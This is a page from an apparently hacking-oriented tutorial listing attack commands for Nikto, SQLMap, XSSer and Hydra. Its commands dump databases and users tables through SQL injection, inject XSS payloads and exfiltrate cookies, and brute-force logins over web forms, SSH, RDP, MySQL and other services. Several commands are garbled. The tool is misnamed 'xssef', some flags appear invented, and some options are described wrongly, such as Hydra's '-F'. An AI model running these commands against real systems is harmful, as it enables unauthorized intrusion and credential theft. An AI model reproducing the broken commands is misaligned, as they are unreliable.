Nikto, SQLMap, XSSer & Hydra Overview

Nikto

Nikto is a powerful web server vulnerability scanner used to identify security issues on websites. Here are several ways to use Nikto effectively:

Basic Web Server Scan:
Perform a basic scan on a website:
```
nikto -h https://www.example.com
```
Scan Specific Port:
Scan a specific port on the target:
```
nikto -h https://www.example.com -p 8080
```

Scan Multiple Hosts:

Scan multiple hosts:

nikto -h https://www.example1.com https://www.example2.com

Save Output to File:
Save scan results to a file (output.txt):
```
nikto -h https://www.example.com -o output.txt
```
Full Scan with Manual Tuning:
Perform a comprehensive scan with manual tuning options:
```
nikto -h https://www.example.com -maxtime 3600 -Plugins -Tuning 8
```
SSL Certificate Check:
Check SSL certificate details:
```
nikto -h https://www.example.com -ssl
```
Scan with Authentication:
Perform a scan with authentication credentials (admin:password):
```
nikto -h https://www.example.com -id admin:password
```
Suppress Output:
Suppress all output (useful for scripting):
```
nikto -h https://www.example.com -o /dev/null
```

Scan Specific Paths:

Scan specific paths (/app, /secure) on the target:

nikto -h https://www.example.com -C all -Tuning 2 -p 443 -root /app,/secure

Disable Certain Checks:
Disable specific checks (e.g., XSS):
```
nikto -h https://www.example.com -C all,-XSS
```

SQLMap

SQLMap is a powerful command-line tool used for detecting and exploiting SQL injection vulnerabilities in web applications. Here are several examples of how to use SQLMap effectively:

Basic Scan for SQL Injection:
Perform a basic scan to detect SQL injection vulnerabilities:
```
sqlmap -u "https://www.example.com/page?id=1"
```
Detecting SQL Injection and Getting Database Information:
Detect SQL injection and retrieve database information:
```
sqlmap -u "https://www.example.com/page?id=1" --dbs
```
Enumerating Tables in a Database:
Enumerate tables in a specific database (dbname):
```
sqlmap -u "https://www.example.com/page?id=1" -D dbname --tables
```
Dumping Data from a Specific Table:
Dump data from a specific table (users):
```
sqlmap -u "https://www.example.com/page?id=1" -D dbname -T users --dump
```
Exploiting Time-Based Blind SQL Injection:
Exploit time-based blind SQL injection technique with a specified time delay (5 seconds):
```
sqlmap -u "https://www.example.com/page?id=1" --technique=T --time-sec=5
```
Using Custom Injection Payload:
Use a custom injection payload (1' OR '1'='1) with data parameter (param=value):
```
sqlmap -u "https://www.example.com/page?id=1" --data="param=value" --pload="1' OR '1'='1"
```
Dumping All Databases:
Dump all databases on the target server:
```
sqlmap -u "https://www.example.com/page?id=1" --all-dbs
```
Brute Forcing Table Columns:
Brute force table columns in a specific database and table (dbname.users):
```
sqlmap -u "https://www.example.com/page?id=1" -D dbname -T users --columns
```
Exploiting Union-Based SQL Injection:
Exploit union-based SQL injection technique:
```
sqlmap -u "https://www.example.com/page?id=1" --technique=U
```
Using a Configuration File:
Use SQLMap with a configuration file (sqlmapconfig.conf):
```
sqlmap -c sqlmapconfig.conf
```

XSSer

XSSer is a command-line tool designed for detecting and exploiting Cross-Site Scripting (XSS) vulnerabilities in web applications. Here are several examples of how to use XSSer effectively:

Basic Scan for Stored XSS:
Perform a basic scan for stored XSS vulnerabilities on a specific URL parameter (comment):
```
xssef -u "https://www.example.com/profile?id=1" -c "comment"
```
DOM-based XSS Scan:
Conduct a scan specifically for DOM-based XSS vulnerabilities:
```
xssef -u "https://www.example.com/page" --dom
```
Scanning Multiple URLs:
Scan multiple URLs listed in a file (urls.txt):
```
xssef -l urls.txt
```
Cookie-based XSS Exploitation:
Exploit XSS using a specific cookie (auth=12345):
```
xssef -u "https://www.example.com/login" --cookie "auth=12345"
```
Reflected XSS Detection:
Detect reflected XSS vulnerabilities with a custom payload in a query parameter:
```
xssef -u "https://www.example.com/search?q=<script>alert(1)</script>"
```
Blind XSS Scan with Custom Payload:
Perform a blind XSS scan with a custom payload (<script>alert(1)</script>) injected into a parameter (name):
```
xssef -u "https://www.example.com/profile" -v -p "name" -vPayload "<script>alert(1)</script>"
```
Exfiltrating Cookies via XSS:
Exfiltrate cookies (auth=12345) via XSS exploitation:
```
xssef -u "https://www.example.com/profile" --cookie "auth=12345" -E
```
Brute Forcing Payloads:
Brute force payloads to discover XSS vulnerabilities:
```
xssef -u "https://www.example.com/page" --brute
```
Custom User-Agent Header:
Send requests with a custom User-Agent header (MyCustomUserAgent):
```
xssef -u "https://www.example.com/page" -H "User-Agent: MyCustomUserAgent"
```
XSS Filter Bypass Attempt:
Attempt to bypass XSS filters on the target:
```
xssef -u "https://www.example.com/page" --filter-bypass
```

Hydar Tool

Hydra is a versatile command-line tool for performing brute force attacks against various protocols and services. Here are several examples of how to use Hydra effectively:

HTTP/HTTPS Authentication

Brute Force Attack on Login Form:
Perform a brute force attack on a login form with a specific username (admin) and passwords from a file (passwords.txt):
```
hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"
```
Dictionary Attack with Custom Usernames:
Conduct a dictionary attack using custom usernames (users.txt) and passwords (passwords.txt):
```
hydra -L users.txt -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"
```

Using Custom User-Agent Header:

Send requests with a custom User-Agent header (MyCustomUserAgent):

hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -H "User-Agent: MyCustomUserAgent"

Specifying a Non-Standard Port:

Specify a non-standard port (8080) for the target service:

hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -s 8080

Using a Proxy for Requests:

Route requests through a SOCKS5 proxy (localhost:9050):

hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -x socks5://localhost:9050

Brute Forcing Different HTTP Methods:
Perform brute force attacks using different HTTP methods (e.g., GET, POST):
```
hydra -l admin -P passwords.txt example.com http-get-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"
```

Parallel Login Attempts:

Increase the number of parallel login attempts (16):

hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -t 16

Limiting Number of Attempts per User:

Limit the number of login attempts per user (-F):

hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -F

Other Protocol Examples

Here are examples for brute forcing passwords across various protocols:

SSH:

hydra -l username -P passwords.txt ssh://target_ip

FTP:

hydra -l admin -P wordlist.txt ftp://ftp.example.com

SMTP:

hydra -l email@example.com -P passwords.txt smtp://mail.example.com

MySQL:

hydra -l root -P passwords.txt mysql://target_ip

RDP:

hydra -l administrator -P passwords.txt rdp://target_ip

VNC:

hydra -l admin -P passwords.txt vnc://target_ip

Telnet:

hydra -l admin -P passwords.txt telnet://target_ip

Hacker's Mantra:Are hackers a threat? The degree of threat presented by any conduct, whether legal or illegal, depends on the actions and intent of the individual and the harm they cause.

PreviousBurpSuite and ZAP-Proxy Overview NextExtra Resources

Last updated 9 months ago

Was this helpful?